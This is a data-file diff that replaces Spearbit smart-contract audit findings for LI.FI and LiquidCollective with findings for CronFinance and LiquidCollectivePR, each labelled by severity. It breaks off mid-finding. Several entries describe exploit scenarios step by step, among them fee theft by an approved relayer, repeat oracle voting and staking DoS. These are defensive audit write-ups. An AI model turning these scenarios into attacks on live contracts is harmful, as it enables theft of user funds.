"https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "Admin status can be changed in a single transaction. This may result in unintended behaviour if the incorrect address is passed.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "LibBytes can be improved", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The following functions are not used concat() concatStorage() equal() equalStorage() toBytes32() toUint128() toUint16() toUint256() toUint32() toUint64() toUint8() toUint96() The call to function slice() for calldata arguments (as done in AxelarExecutor) can be replaced with the in-built slicing provided by Solidity. Refer to its documentation.", + "title": "Incomplete token simulation in CronV1Pool due to missing queryJoin and queryExit functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The CronV1Pool contract is missing the queryJoin and queryExit functions, which are significant for calculating maxAmountsIn and/or minBptOut on pool joins, and minAmountsOut and/or maxBptIn on pool exits, respectively.
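For reference, a hedged sketch of the missing hooks; the signatures below follow the standard query functions of Balancer v2's BasePool and are an assumption rather than CronFi code:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Hedged sketch: simulation-only entry points that would let integrators
// compute expected BPT and token amounts off-chain before joining/exiting.
interface IPoolQueries {
    function queryJoin(
        bytes32 poolId, address sender, address recipient,
        uint256[] memory balances, uint256 lastChangeBlock,
        uint256 protocolSwapFeePercentage, bytes memory userData
    ) external returns (uint256 bptOut, uint256[] memory amountsIn);

    function queryExit(
        bytes32 poolId, address sender, address recipient,
        uint256[] memory balances, uint256 lastChangeBlock,
        uint256 protocolSwapFeePercentage, bytes memory userData
    ) external returns (uint256 bptIn, uint256[] memory amountsOut);
}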
The ability to calculate these values is very important in order to ensure proper enforcement of slippage tolerances and mitigate the risk of sandwich attacks.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Keep generic errors in the GenericErrors", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "During the code review, it has been noticed that some of the contracts re-define errors. Generic errors like WithdrawFailed can be kept in GenericErrors.sol", + "title": "A partner can trigger Rook update", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "A partner can trigger a Rook update if they return Rook's current list within an update. Scenario: A partner calls updateArbitrageList, the IArbitrageurList(currentList).nextList() returns Rook's rookPartnerContractAddr and gets updated; the partner calls updateArbitrageList again, so this time isRook will be true.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Attention points for making the Diamond immutable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "There are additional attention points to decide upon when making the Diamond immutable: After removing the Owner, the following functions won't work anymore: AccessManagerFacet.sol - setCanExecute() AxelarFacet.sol - setChainName() HopFacet.sol - registerBridge() MultichainFacet.sol - updateAddressMappings() & registerRouters() OptimismBridgeFacet.sol - registerOptimismBridge() PeripheryRegistryFacet.sol - registerPeripheryContract() StargateFacet.sol - setStargatePoolId() & setLayerZeroChainId() WormholeFacet.sol - setWormholeChainId() & setWormholeChainIds() There is another authorization mechanism via LibAccess, which arranges access to the functions of DexManagerFacet.sol WithdrawFacet.sol Several Periphery contracts also have an Owner: AxelarExecutor.sol ERC20Proxy.sol Executor.sol FeeCollector.sol Receiver.sol RelayerCelerIM.sol ServiceFeeCollector.sol Additionally ERC20Proxy has an authorization mechanism via authorizedCallers[]", + "title": "Approved relayer can steal cron's fees", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "A relayer within Balancer is set per vault per address. If feeAddr ever adds a relayer within the Balancer vault, the relayer can call exitPool with a recipient of their choice, and the check on line 225 will pass as the sender will still be feeAddr but the true msg.sender is the relayer.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Check on the final asset in _swapData", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "MakerTeleportFacet verifies that the final received asset in _swapData is DAI. This check is not present in the majority of the facets (including CircleBridgeFacet).
Ideally, every facet should have the check that the final receivingAssetId is equal to sendingAssetId.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Discrepancies in pragma versioning across facet implementations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The use of different pragma versions in facet implementations can present several implications, with potential risks and compliance concerns that need to be addressed to maintain robust and compliant contracts.", + "title": "Price Path Due To Long-Term Orders Neglected In Oracle Updates", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The _updateOracle() function takes its price sample as the final price after virtual order execution for whatever time period has elapsed since the last join/exit/swap. Since the price changes continuously during that interval if there are long-term orders active (unlike in Uniswap v2, where the price is constant between swaps), this is inaccurate - strictly speaking, one should integrate over the price curve as defined by LT orders to get a correct sample. The longer the interval, the greater the potential for inaccuracy.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Inconsistent use of validateDestinationCallFlag()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "Highlighted code can be replaced with a call to the validateDestinationCallFlag() function as done in other Facets.", + "title": "Vulnerabilities noted from npm audit", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "npm audit notes: 76 vulnerabilities (5 low, 16 moderate, 27 high, 28 critical).", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Inconsistent utilization of the isNativeAsset function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The isNativeAsset function is designed to distinguish native assets from other tokens within facet-based smart contract implementations. However, it has been observed that the usage of the isNativeAsset function is not consistent across various facets. Ensuring uniform application of this function is crucial for maintaining the accuracy and reliability of the asset identification and processing within the facets.", + "title": "Receive sorted tokens at creation to reduce complexity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "Currently, when a pool is created, logic is implemented within the constructor to determine if the tokens are sorted by address,
a requirement needed for Balancer Pool creation. This logic adds unnecessary gas consumption and complexity throughout the contract, as every time amounts are retrieved from Balancer, the Cron Pool must check the order of the tokens and make sure that the difference between sorted (Balancer) and unsorted (Cron) token addresses is handled. An example can be seen in onJoinPool: uint256 token0InU112 = amountsInU112[TOKEN0_IDX]; uint256 token1InU112 = amountsInU112[TOKEN1_IDX]; where the amountsInU112 array is retrieved from Balancer sorted (index 0 == token0 and index 1 == token1), but on the Cron side we must make sure that we retrieved the correct amount based on whether the tokens were sent sorted or not when the pool was created.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Gas Optimization" ] }, { - "title": "Unused events/errors", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The contracts contain several events and error messages that are not used anywhere in the contract code. These unused events and errors add unnecessary code to the contract, increasing its size.", + "title": "Remove double reentrancy checks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "A number of CronV1Pool functions include reentrancy checks; however, they are only callable from a Balancer Vault function that already has a reentrancy check.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Gas Optimization" ] }, { - "title": "Make bridge parameters dynamic by keeping them as a parameter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The current implementation has some bridge parameters hardcoded within the smart contract. This approach limits the flexibility of the contract and may cause issues in the future when upgrades or changes to the bridge parameters are required. It would be better to keep the bridge parameters as a parameter to make them dynamic and easily changeable in the future. HopFacetOptimized.sol => Relayer & RelayerFee MakerTeleportFacet.sol => Operator, the person (or specified third party) responsible for initiating the minting process on the destination domain by providing (in the fast path) Oracle attestations.", + "title": "TWAMM Formula Computation Can Be Made Correct-By-Construction and Optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The linked lines are the core calculation of TWAMM virtual order execution. They involve checked arithmetic in the form of underflow-checked subtractions; there is thus a theoretical risk that rounding error could lead to a \"freezing\" of a TWAMM pool. One of the subtractions, that for token1OutU112, is already \"correct-by-construction\", i.e. it can never underflow.
The calculation of token0OutU112 can be reformulated to be explicitly safe as well; the following overall refactoring is suggested: uint256 ammEndToken0 = (token1ReserveU112 * sum0) / sum1; uint256 ammEndToken1 = (token0ReserveU112 * sum1) / sum0; token0ReserveU112 = ammEndToken0; token1ReserveU112 = ammEndToken1; token0OutU112 = sum0 - ammEndToken0; token1OutU112 = sum1 - ammEndToken1; Both output calculations are now of the form x - (x * y) / (y + z) for non-negative x, y, and z, allowing subtraction operations to be unchecked, which is both a gas optimization and gives confidence the calculation cannot freeze up unexpectedly due to an underflow. Replacement of divDown by / gives equivalent semantics with lower overhead. An additional advantage of this formulation is its manifest symmetry under 0 <-> 1 interchange; this serves as a useful heuristic check on the computation, as it should possess the same symmetry as the invariant.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Gas Optimization" ] }, { - "title": "Incorrect comment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The highlighted comment incorrectly refers to the USDC address as the DAI address.", + "title": "Gas Optimizations In Bit Packing Functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The bit packing operations are heavily used throughout the gas-critical swap code path, the optimization of which was flagged as high-priority by the CronFi team. Thus they were carefully reviewed not just for correctness, but also for gas optimization. L119: unnecessary & due to check on L116 L175: could hardcode clearMask L203: could hardcode clearMask L240: could hardcode clearMask L241: unnecessary & due to check on line 237 L242: unnecessary & due to check on line 238 L292: could hardcode clearMask L328: could hardcode clearMask L343: unnecessary to mask when _isWord0 == true L359: unnecessary & operations due to checks on lines 356 and 357 L372: unnecessary masking L389: could hardcode clearMask L390: unnecessary & due to check on L387 L415: could hardcode clearMask L416: unnecessary & operation due to check on line 413 L437: unnecessary clearMask L438: unnecessary & due to check on line 435 L464: could hardcode clearMask L465: unnecessary & due to check on line 462 Additionally, the following code pattern appears in multiple places: requireErrCode(increment <= CONST, CronErrors.INCREMENT_TOO_LARGE); value += increment; requireErrCode(value <= CONST, CronErrors.OVERFLOW); Unless there's a particular reason to want to detect a too-large increment separately from an overflow, these patterns could all be simplified to requireErrCode(CONST - value >= increment, CronErrors.OVERFLOW); value += increment; as any increment greater than CONST will cause overflow anyway and value is always in the correct range by construction. This allows CronErrors.INCREMENT_TOO_LARGE to be removed as well.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Gas Optimization" ] }, { - "title": "Redundant console log", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The contract includes Console.sol from a test file, which is only used for debugging purposes.
Including it in the final version of the contract can increase the contract size and consume more gas, making it more expensive to deploy and execute.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Gas Optimization" ] }, { - "title": "SquidFacet doesn't revert for incorrect routerType", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "If _squidData.routeType passed by the user doesn't match BridgeCall, CallBridge, or CallBridgeCall, SquidFacet just takes the funds from the user and returns without calling the bridge. This, when combined with the issue \"Max approval to any address is possible\", lets anyone steal those funds. Note: Solidity enum checks should prevent this issue, but it is safer to do an extra check.", + "title": "Using extra storage slot to store two mappings of the same information", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "A second storage slot is used to store a duplicate mapping of the same token pair but in reverse order. If the tokens are sorted in a getter function then the second mapping does not need to be used.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Gas Optimization" ] }, { - "title": "Operators._hasFundableKeys returns true for operators that do not have fundable keys", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Because _hasFundableKeys uses operator.stopped in the check, an operator without fundable keys can be validated and return true. Scenario: Op1 has keys = 10 limit = 10 funded = 10 stopped = 10 This means that all the keys got funded, but also \"exited\". Because of how _hasFundableKeys is made, when you call _hasFundableKeys(op1) it will return true even if the operator does not have keys available to be funded. By returning true, the operator gets wrongly included in the array returned by getAllFundable. That function is critical because it is the one used by pickNextValidators, which picks the next validator to be selected and stakes users' deposited ETH. Because of this issue in _hasFundableKeys, the issue \"OperatorsRegistry._getNextValidatorsFromActiveOperators can DOS Alluvial staking if there's an operator with funded==stopped and funded == min(limit, keys)\" can also happen, DOSing the contract so that pickNextValidators always returns empty.
Check Appendix for a test case to reproduce this issue.", + "title": "Initializing with default value is consuming unnecessary gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "Every variable declaration followed by initialization with its default value consumes unnecessary gas and is redundant. The provided line within the context is just an example.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Critical Risk" + "CronFinance", + "Severity: Gas Optimization" ] }, { - "title": "OperatorsRegistry._getNextValidatorsFromActiveOperators can DOS Alluvial staking if there's an operator with funded==stopped and funded == min(limit, keys)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "This issue is also related to OperatorsRegistry._getNextValidatorsFromActiveOperators should not consider stopped when picking a validator. Consider a scenario where we have Op at index 0 name op1 active true limit 10 funded 10 stopped 10 keys 10 Op at index 1 name op2 active true limit 10 funded 0 stopped 0 keys 10 In this case, Op1 got all 10 keys funded and exited. Because it has keys=10 and limit=10 it means that it has no more keys to get funded again. Op2 instead still has 10 approved keys to be funded. Because of how the selection of the picked validator works uint256 selectedOperatorIndex = 0; for (uint256 idx = 1; idx < operators.length;) { if ( operators[idx].funded - operators[idx].stopped < operators[selectedOperatorIndex].funded - operators[selectedOperatorIndex].stopped ) { selectedOperatorIndex = idx; } unchecked { ++idx; } } When the function finds an operator with funded == stopped it will pick that operator because 0 < operators[selectedOperatorIndex].funded - operators[selectedOperatorIndex].stopped. After the loop ends, selectedOperatorIndex will be the index of an operator that has no more validators to be funded (for this scenario). Because of this, the following code uint256 selectedOperatorAvailableKeys = Uint256Lib.min( operators[selectedOperatorIndex].keys, operators[selectedOperatorIndex].limit ) - operators[selectedOperatorIndex].funded; when executed on Op1 will set selectedOperatorAvailableKeys = 0 and as a result, the function will return return (new bytes[](0), new bytes[](0));. In this scenario when stopped==funded and there are no keys available to be funded (funded == min(limit, keys)) the function will always return an empty result, breaking the pickNextValidators mechanism, which won't be able to stake users' deposited ETH anymore even if there are operators with fundable validators. Check the Appendix for a test case to reproduce this issue.", + "title": "Factory requirement can be circumvented within the constructor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The constructor checks if the _factory parameter is the msg.sender. This behavior was, at first, created so that only the factory would be able to deploy pools.
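A hedged sketch of why that check is redundant (constructor reduced to the relevant line; names approximate):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract PoolConstructorSketch {
    // The factory's create() shown earlier passes address(this) as _factory,
    // so for factory deployments this compares msg.sender with itself.
    constructor(address _factory) {
        require(msg.sender == _factory, "NON_FACTORY_DEPLOYMENT"); // vacuously true via create()
    }
}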
The check on line 484 is obsolete, as pools deployed via the factory will always have msg.sender == factory address, making the _factory parameter obsolete as well.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Critical Risk" + "CronFinance", + "Severity: Gas Optimization" ] }, { - "title": "Oracle.removeMember could, in the same epoch, allow members to vote multiple times and other members to not vote at all", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The current implementation of removeMember introduces an exploit that allows an oracle member to vote again and again (in the same epoch), while an oracle member that has never voted is prevented from voting (in the same epoch). Because of how OracleMembers.deleteItem is implemented, it will swap the last item of the array with the one that will be deleted and pop the last element. Let's make an example: 1) At T0 m0 is added to the list of members: members[0] = m0. 2) At T1 m1 is added to the list of members: members[1] = m1. 3) At T3 m0 calls reportBeacon(...). By doing that, ReportsPositions.register(uint256(0)); will be called, registering that the member at index 0 has registered the vote. 4) At T4, the oracle admin calls removeMember(m0). This operation, as we said, will swap the member's address from the last position of the array of members with the position of the member that will be deleted. After doing that, it will pop the last position of the array. The state changes from members[0] = m0; members[1] = m1 to members[0] = m1;. At this point, the oracle member m1 will not be able to vote during this epoch because when he/she calls reportBeacon(...) the function will enter inside the check if (ReportsPositions.get(uint256(memberIndex))) { revert AlreadyReported(_epochId, msg.sender); } This is because int256 memberIndex = OracleMembers.indexOf(msg.sender); will return 0 (the position of the m0 member that has already voted) and ReportsPositions.get(uint256(0)) will return true. At this point, if for whatever reason an admin of the contract adds the deleted oracle member again, it would be added to position 1 of the array of members, allowing the same member that has already voted to vote again. Note: while the scenario where a removed member can vote multiple times would involve a corrupted admin (that would re-add the same member), the second scenario, which prevents a user from voting, would be more common. Check the Appendix for a test case to reproduce this issue.
14", + "title": "Usability: added remove, set pool functionality to CronV1PoolFactory (Changes from dev team added to audit.)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "Conversations with the audit team indicated functions were needed to manage pool mappings post- creation in the event that a pool needed to be deprecated or replaced.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: High Risk" + "CronFinance", + "Severity: Informational" ] }, { - "title": "Order of calls to removeValidators can affect the resulting validator keys set", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "If two entities A and B (which can be either the admin or the operator O with the index I) send a call to removeValidators with 2 different set of parameters: T1 : (I, R1) T2 : (I, R2) Then depending on the order of transactions, the resulting set of validators for this operator might be different. And since either party might not know a priori if any other transaction is going to be included on the blockchain after they submit their transaction, they don't have a 100 percent guarantee that their intended set of validator keys are going to be removed. This also opens an opportunity for either party to DoS the other party's transaction by frontrunning it with a call to remove enough validator keys to trigger the InvalidIndexOutOfBounds error: OperatorsRegistry.1.sol#L324-L326: if (keyIndex >= operator.keys) { revert InvalidIndexOutOfBounds(); } to removeValidators and compare it", + "title": "Virtual oracle getter--gets oracle value at block > lvob (Changes from dev team added to audit.)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "Through the audit process, sufficient contract space became available to add an oracle getter con- venience that returns the oracle values and timestamps. However, this leaves the problem of not being able to get the oracle price at the current block in a pool with low volume but virtual orders active.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: High Risk" + "CronFinance", + "Severity: Informational" ] }, { - "title": "Non-zero operator.limit should always be greater than or equal to operator.funded", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "For the subtraction operation in OperatorsRegistry.1.sol#L428-L430 to not underflow and revert, there should be an assumption that operators[selectedOperatorIndex].limit >= operators[selectedOperatorIndex].funded Perhaps this is a general assumption, but it is not enforced when setOperatorLimits is called with a new set of limits.", + "title": "Loss of assets due to rounding during _longTermSwap", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "When a long term swap (LT) is created, the selling rate for that LT is set based on the amount and the number of blocks that order will be traded for. uint256 lastExpiryBlock = block.number - (block.number % ORDER_BLOCK_INTERVAL); uint256 orderExpiry = ORDER_BLOCK_INTERVAL * (_orderIntervals + 1) + lastExpiryBlock; // +1 protects from div 0 ,! 
uint256 tradeBlocks = orderExpiry - block.number; uint256 sellingRateU112 = _amountInU112 / tradeBlocks; During the computation of the number of blocks the order must trade for, defined as tradeBlocks, the order expiry is computed from the last expiry block based on the OBI (Order Block Interval). If tradeBlocks is big enough (it can be a max of 176102 based on the STABLE_MAX_INTERVALS), then sellingRateU112 will suffer a loss due to Solidity's round-down behavior. This is a manageable loss for tokens with many decimals, but for tokens with few decimals it will have quite an impact. E.g. Wrapped BTC has 8 decimals, and MAX_ORDER_INTERVALS can be at most 176102 as per the stable max intervals defined within the constants; that being said, a user can lose quite a significant value of BTC: 0.00176101. This issue is marked as Informational severity as the amount lost might not be that significant. This can change in the future if the token being LTed has a big value and a small number of decimals.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "CronFinance", + "Severity: Informational" ] }, { - "title": "Decrementing the quorum in Oracle in some scenarios can open up a frontrunning/backrunning opportunity for some oracle members", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Assume there are 2 groups of oracle members A, B where they have voted for report variants Va and Vb respectively. Let's also assume the counts for these variants Ca and Cb are equal and are the highest variant vote counts among all possible variants. If the Oracle admin changes the quorum to a number less than or equal to Ca + 1 = Cb + 1, any oracle member can backrun this transaction by the admin to decide which report variant Va or Vb gets pushed to the River. This is because when a lower quorum is submitted by the admin and there exist two variants that have the highest number of votes, in the _getQuorumReport function the returned isQuorum parameter would be false since repeat == 0 is false: Oracle.1.sol#L369: return (maxval >= _quorum && repeat == 0, variants[maxind]); Note that this issue also exists in the commit hash 030b52feb5af2dd2ad23da0d512c5b0e55eb8259 and can be triggered by the admin either by calling setQuorum or addMember when the abovementioned conditions are met. Also, note that the free oracle member agent can frontrun the admin transaction to decide the quorum earlier in the scenario above. Thus this way _getQuorumReport would actually return that it is a quorum.", + "title": "Inaccuracies in Comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "A number of minor inaccuracies were discovered in comments that could impact the comprehensibility of the code to future maintainers, integrators, and extenders. [1] bit-0 should be bit-1 [2] less than should be at most [3] Maximally Extracted Value should be Maximal Extractable Value see flashbots.net [4] Maximally Extracted Value should be Maximal Extractable Value see flashbots.net [5] on these lines unsold should be sold [6] These comments are not applicable to the code block below them, as they mention looping but no looping is done; it seems they were copied over from the loop on line 54. [7] These comments are not applicable to the code block below them, as they mention looping but no looping is done; it seems they were copied over from the loop on line 111.
[8] omitted should be emitted", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "CronFinance", + "Severity: Informational" ] }, { - "title": "_getNextValidatorsFromActiveOperators can be tweaked to find an operator with a better validator pool", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Assume for an operator: (A, B) = (funded - stopped, limit - funded) The current algorithm finds the first index in the cached operators array with the minimum value for A and tries to gather as many publicKeys and signatures from this operator's validators up to a max of _requestedAmount. But there is also the B cap for this amount. And if B is zero, the function returns early with empty arrays. Even though there could be other approved and non-funded validators from other operators. Related: OperatorsRegistry._getNextValidatorsFromActiveOperators should not consider stopped when picking a validator, OperatorsRegistry._getNextValidatorsFromActiveOperators can DOS Alluvial staking if there's an operator with funded==stopped and funded == min(limit, keys), _hasFundableKeys marks operators that have no more fundable validators as fundable.", + "title": "Unsupported SwapKind.GIVEN_OUT may limit the compatibility with Balancer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The Balancer protocol utilizes two types of swaps for its functionality - GIVEN_IN and GIVEN_OUT. GIVEN_IN specifies the exact amount of tokens the user sends into the swap (with a limit on the minimum amount received). GIVEN_OUT specifies the exact amount of tokens the user receives from the swap (with a limit on the maximum amount sent). However, the onSwap function of the CronV1Pool contract only accepts the IVault.SwapKind.GIVEN_IN value as the IVault.SwapKind field of the SwapRequest struct. The unsupported SwapKind.GIVEN_OUT may limit the compatibility with Balancer on the Batch Swaps and the Smart Order Router functionality, as a single SwapKind is given as an argument.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "CronFinance", + "Severity: Informational" ] }, { - "title": "Dust might be trapped in WlsETH when burning one's balance.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "It is not possible to burn the exact amount of minted/deposited lsETH back because the _value provided to burn is denominated in ETH. Assume we've called mint(r, v) with our address r; then to get the v lsETH back to our address, we need to find an x where v = floor(x * S / B) and call burn(r, x). (Here S represents the total shares of lsETH and B the total underlying value.) It's not always possible to find the exact x. So there will always be an amount locked in this contract (v - floor(x * S / B)). These dust amounts can accumulate from different users and turn into a big number. To get the full amount back, the user needs to mint more wlsETH tokens so that we can find an exact solution to v = floor(x * S / B). The extra amount to get the locked-up fees back can be engineered. The same problem exists for transfer and transferFrom. Also note, if you have minted x amount of shares, the balanceOf would tell you that you own b = floor(x * B / S) wlsETH. Internally wlsETH keeps track of the shares x.
So users think they can only burn b amount; plugging that in for the _value, the number of shares burnt would be floor(floor(x * B / S) * S / B), which has even more rounding errors. wlsETH could internally track the underlying, but then it would not appreciate in value like lsETH; it would basically be a kind of wETH. We think the issue of not being able to transfer your full amount of shares is not as serious as not being able to burn back your shares into lsETH. On the same note, we think it would be beneficial to expose the wlsETH share amount to the end user: function sharesBalanceOf(address _owner) external view returns (uint256 shares) { return BalanceOf.get(_owner); }", + "title": "A pool's first LP will always take a minor loss on the value of their liquidity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The first liquidity provider for a pool will always take a small loss on the value of their tokens deposited into the pool because 1000 balancer pool tokens are minted to the zero address on the initial deposit. As most tokens have 18 decimal places, this value would be negligible in most cases; however, for tokens with a high value and small decimals the effects may be more apparent.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "CronFinance", + "Severity: Informational" ] }, { - "title": "BytesLib.concat can potentially return results with dirty byte paddings.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "concat does not clean the potential dirty bytes that might have been copied from _postBytes (nor does it clean the padding). The dirty bytes from _postBytes are carried over to the padding for tempBytes.", + "title": "The _withdrawCronFees function should revert if no fees to withdraw", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The _withdrawCronFees function checks if there are any Cron Fees that need to be withdrawn; currently, this function does not revert in case there are no fees.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "CronFinance", + "Severity: Informational" ] }, { - "title": "The reportBeacon is prone to front-running attacks by oracle members", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "There could be a situation where the oracle members are segmented into 2 groups A and B, and members of the group A have voted for the report variant Va and the group B for Vb. Also, let's assume these two variants are 1 vote short of quorum. Then either group can try to front-run the other to push their submitted variant to river.", + "title": "Schedule amounts cannot be revoked or released", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "The migration for schedule ids 9 to 12 has the following parameters: // 9 -> 12 migrations[3] = VestingScheduleMigration({ scheduleCount: 4, newStart: 0, newEnd: 1656626400, newLockDuration: 72403200, setCliff: true, setDuration: true, setPeriodDuration: true, ignoreGlobalUnlock: false }); The current start is 7/1/2022 0:00:00 and the updated/migrated end value would be 6/30/2022 22:00:00; this will cause _computeVestedAmount(...)
to always return 0 when one is calculating the released amount, due to capping the time by the end timestamp. And thus tokens would not be able to be released. Also, these tokens cannot be revoked, since the set [start, end] where end < start would be empty.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "LiquidCollectivePR", + "Severity: Low Risk" ] }, { - "title": "Shares distributed to operators suffer from rounding error", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "_rewardOperators distributes a portion of the overall shares distributed to operators based on the number of active and funded validators that each operator has. The current number of shares distributed to a validator is calculated by the following code _mintRawShares(operators[idx].feeRecipient, validatorCounts[idx] * rewardsPerActiveValidator); where rewardsPerActiveValidator is calculated as uint256 rewardsPerActiveValidator = _reward / totalActiveValidators; This means that in reality each operator receives validatorCounts[idx] * (_reward / totalActiveValidators) shares. Such share calculation suffers from a rounding error caused by division before multiplication.", + "title": "A revoked schedule might be able to be fully released before the 2 year global lock period", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "The unlockedAmount calculated in _computeGlobalUnlocked(...) is based on the original scheduledAmount. If a creator revokes its revocable vesting schedule and changes the end time to a new earlier date, this formula does not use the new effective amount (the total 